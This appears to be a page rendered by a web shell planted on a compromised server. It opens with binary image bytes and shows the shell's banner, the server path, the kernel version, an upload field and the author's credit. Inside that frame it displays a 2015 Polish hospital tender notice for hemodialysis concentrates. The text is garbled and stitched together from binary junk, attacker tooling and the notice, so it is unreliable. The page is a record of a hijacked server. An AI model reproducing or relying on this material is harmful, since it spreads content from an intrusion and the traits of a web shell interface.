JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150213/19919-N-2015.html

<p class="kh_header"><b>Płock: Dostawa koncentratów do hemodializ i dzierżawa mieszalnika do produkcji koncentratu</b><br>
<b>Numer ogłoszenia: 19919 - 2015; data zamieszczenia: 13.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony , ul. Medyczna 19, 09-400 Płock, woj. mazowieckie, tel. 024 3646105, 3646330, faks 024 3646101,3646329.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa koncentratów do hemodializ i dzierżawa mieszalnika do produkcji koncentratu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa koncentratów do hemodializ i dzierżawa mieszalnika do produkcji koncentratu /pakiety od nr 1 do nr 3/.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-0, 33.69.28.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium i zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeśli wykonawca składający ofertę wykaże, że posiada uprawnienia do obrotu (sprzedaży) produktami leczniczymi (roztwory do dializ) będącymi przedmiotem zamówienia i określonymi w części zamówienia na którą wykonawca składa ofertę, tj. uzyskał zezwolenie (dawniej koncesję) zgodnie z przepisami ustawy z dnia 6 września 2001 roku Prawo Farmaceutyczne - dotyczy oferty na przedmiot zamówienia którego sprzedaż wymaga posiadania zezwolenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Oświadczenie, że wszystkie oferowane produkty są  dopuszczone do obrotu i używania  w jednostkach służby zdrowia na terytorium RP zgodnie z polskim prawem oraz prawem Unii Europejskiej; posiadają aktualne polskie lub obowiązujące w Unii Europejskiej certyfikaty/świadectwa  lub atesty dopuszczenia do stosowania w placówkach ochrony zdrowia oraz wpisy do odpowiednich rejestrów, o ile są wymagane zgodnie z prawem (dokonanie zgłoszenia lub powiadomienia odpowiedniego podmiotu o wprowadzeniu wyrobu do obrotu lub do używania zgodnie z obowiązującym prawem), oraz, że oferowane produkty lecznicze (roztwory do dializ), posiadają wpis do Urzędowego Wykazu Produktów Leczniczych Dopuszczonych do Obrotu na Terytorium Rzeczypospolitej Polskiej. (wg załącznika  do SIWZ)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	oświadczenie osoby uprawnionej do reprezentacji firmy (pełnomocnictwo) upoważniające do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie wpisu do odpowiedniego rejestru lub ewidencji. Jeżeli pełnomocnictwo nie ma postaci aktu notarialnego powinno zawierać imienną pieczątkę wystawiającego pełnomocnictwo i jego podpis (lub czytelny podpis). Jeżeli dołączone do oferty ww. pełnomocnictwo będzie w formie kopii, zamawiający wymaga by jego zgodność z oryginałem poświadczył notariusz.

2.	Wypełnione w całości i podpisane wymagane załączniki do SIWZ (bez projektu umowy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji dostaw - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Załącznik nr 6 do SIWZ § 1 pkt 5 projektu umowy:
5. Kupujący przewiduje możliwość zmiany niniejszej umowy w przypadku wystąpienia następujących sytuacji tj.:
5.1 Jeżeli w czasie realizacji umowy producent danego przedmiotu zamówienia zaprzestanie produkcji opakowań w zaoferowanej ilości sztuk/dawce/gramaturze, Kupujący dopuszcza zmianę (wraz z wszelkimi konsekwencjami ilościowymi i rachunkowymi): 
- ilości sztuk przedmiotu zamówienia w opakowaniu po uprzednim powiadomieniu pisemnym Kierownika Apteki Kupującego o proponowanej zmianie i wyrażeniu zgody na taką zmianę przez Kierownika Apteki (po podpisaniu aneksu do umowy).W każdym przypadku zmiany ilości sztuk cena jednostkowa (w przeliczeniu proporcjonalnym) tego przedmiotu zamówienia nie może ulec zmianie - nie może być też zwiększona zakontraktowana ogólna ilość oraz wartość oferty częściowej.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
- dawki przedmiotu zamówienia w opakowaniu po uprzednim powiadomieniu pisemnym Kierownika Apteki Kupującego o proponowanej zmianie i wyrażeniu zgody na taką zmianę przez Kierownika Apteki (po podpisaniu aneksu do umowy). W każdym przypadku zmiany ilości dawek  cena jednostkowa (w przeliczeniu proporcjonalnym) tego przedmiotu zamówienia nie może ulec zmianie, nie może być też zwiększona zakontraktowana ogólna  ilość oraz wartość oferty częściowej.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
- gramatury przedmiotu zamówienia w opakowaniu po uprzednim powiadomieniu pisemnym Kierownika Apteki Kupującego o proponowanej zmianie i wyrażeniu zgody na taką zmianę przez Kierownika Apteki (po podpisaniu aneksu do umowy). W każdym przypadku zmiany  gramatury cena jednostkowa (w przeliczeniu proporcjonalnym) tego przedmiotu zamówienia nie może ulec zmianie, nie może być też zwiększona zakontraktowana ogólna ilość oraz wartość oferty częściowej.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
5.2.Jeżeli w czasie realizacji przedmiotu zamówienia wyczerpana zostanie jedna z dawek tego samego  przedmiotu zamówienia oferty częściowej; możliwa jest zamiana dawek polegająca na  zwiększeniu ilości  dawki wyczerpanej z oferty częściowej z jednoznacznym zmniejszeniem dawki, która  jeszcze  nie uległa wyczerpaniu,  przy proporcjonalnym  przeliczeniu ceny jednostkowej oraz zakontraktowanej ogólnej ilości. (po podpisaniu aneksu do umowy)w przypadku dokonywania w/w zmiany  dopuszcza się zmianę zakontraktowanej ilości oraz dokonanie zmian będących konsekwencjami rachunkowymi poniższego, przy czym nie może być zwiększona  wartość oferty częściowej. 
5.3.Jeżeli w czasie realizacji przedmiotu zamówienia wprowadzona zostanie do obrotu nowa dawka przedmiotu zamówienia  lub zaistnieje potrzeba zakupu innych,  nie ujętych w umowie dawek tego samego przedmiotu zamówienia, możliwa jest zmiana dawek do realizacji lub wprowadzenie  nowej dawki  z jednoczesnym  zmniejszeniem  lub rezygnacją  z dawek  dotychczas przewidzianych w  umowie po podpisaniu aneksu do umowy i po przeliczeniu proporcjonalnym ceny, przy czym wartość oferty częściowej nie może zostać zwiększona.
5.4.Jeżeli w czasie realizacji umowy:
- producent przedmiotu zamówienia wskazanego w umowie - w nazwie handlowej,  zaprzestanie  jego produkcji,        lub
- przedmiot zamówienia wskazany w umowie - w nazwie handlowej, będzie niedostępny na rynku polskim, Kupujący wymaga jego zastąpienia odpowiednikiem chemicznym zgodnym z nazwą międzynarodową przedmiotu zamówienia i rejestracją, o ile Kierownik Apteki wyrazi na takie zastąpienie zgodę (po podpisaniu aneksu do umowy). 
W powyższych przypadkach dopuszcza się zmianę w umowie zaoferowanego  przedmiotu zamówienia, producenta, zaoferowanej ilości opakowań stosownie do ilości  wymaganej  przez Zamawiającego, ceny jednostkowej opakowania na proporcjonalną do oferowanego opakowania  przed zmianą i po zmianie  wraz  z dalszymi konsekwencjami rachunkowymi, przy czym zastrzega się, że całkowita wartość brutto zmienionej pozycji nie może ulec zwiększeniu.
5.5	Kupujący zastrzega sobie możliwość zmiany umowy, z  zastrzeżeniem art. 140 ust.1 i 3 ustawy P.Z.p., w przypadku zmiany w obowiązujących przepisach prawa mających wpływ na przedmiot i warunki umowy oraz zmiany sytuacji prawnej lub faktycznej Sprzedającego i/lub Kupującego skutkującej nie możliwością realizacji przedmiotu umowy.
5.6	 Kupujący zastrzega sobie możliwość zmiany umowy, z zastrzeżeniem art. 140 ust.1 i 3 ustawy P.z.p., w przypadku powstania nadzwyczajnych okoliczności (nie będących /siłą wyższą/),grożących rażącą stratą, których strony nie przewidziały przy zawarciu umowy.
5.7		Kupujący zastrzega sobie możliwość zmiany umowy, z zastrzeżeniem art. 140 ust. 1i 3 ustawy P.z.p., w przypadku wystąpienia niezgodności pomiędzy zapisami umowy, a treścią oferty i/lub SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszplock.pl - zakładka Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1. www.wszplock.pl - zamówienia publiczne - bezplatnie 
2. Wojewódzki Szpital Zespolony, Apteka Szpitalna, ul. Medyczna 19, 09-400 Płock - płatne 10,66zł w kasie szpitala lub przelewem bankowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2015 godzina 10:00, miejsce: Wojewódzki Szpital Zespolony, Apteka Szpitalna /budynek główny WSzZ - nowy pawilon/, ul. Medyczna 19, 09-400 Płock.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koncentrat wodorowęglanowy, koncentrat kwaśny - kapsuły.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-0, 33.69.28.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koncentraty suche oraz dzierżawa mieszalnika do produkcji koncentratu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-0, 33.69.28.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> koncentrat do dializ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.00.00-0, 33.69.28.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com